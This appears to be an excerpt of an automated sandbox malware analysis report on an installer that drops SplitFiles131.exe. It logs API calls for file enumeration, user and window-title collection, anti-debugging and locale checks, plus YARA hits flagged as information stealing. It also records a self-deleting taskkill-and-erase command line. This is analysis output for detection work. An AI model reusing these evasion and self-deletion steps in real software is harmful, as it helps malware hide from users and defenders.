Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-5V8K4.tmp
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409764
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.376486762.000000000164B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc, 2_2_00402F20
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] 2_2_0042041F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] 2_2_00417BAF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] 2_2_100091C7
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] 2_2_10006CE1
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F789 SetUnhandledExceptionFilter, 2_2_0040F789
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F5F5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EBD2
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10006180
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_100035DF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10003AD4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00459734 GetVersion,GetModuleHandleA,6D715550,6D715550,6D715550,AllocateAndInitializeSid,LocalFree, 1_2_00459734
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_004051D8
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_00405224
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: GetLocaleInfoA, 1_2_004085FC
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: GetLocaleInfoA, 1_2_00408648
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_00427041
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_0042708C
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_00427127
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_004271B2
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_0041E2FF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW, 2_2_00427405
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042752B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW, 2_2_00427631
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427700
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW, 2_2_0041E821
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D9F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F7F3 cpuid 2_2_0040F7F3
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D715CA0,SetNamedPipeHandleState,6DB87180,CloseHandle,CloseHandle, 1_2_00455E7C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405CC0 GetVersionExA, 0_2_00405CC0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00453D18 GetUserNameA, 1_2_00453D18

Stealing of Sensitive Information

Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY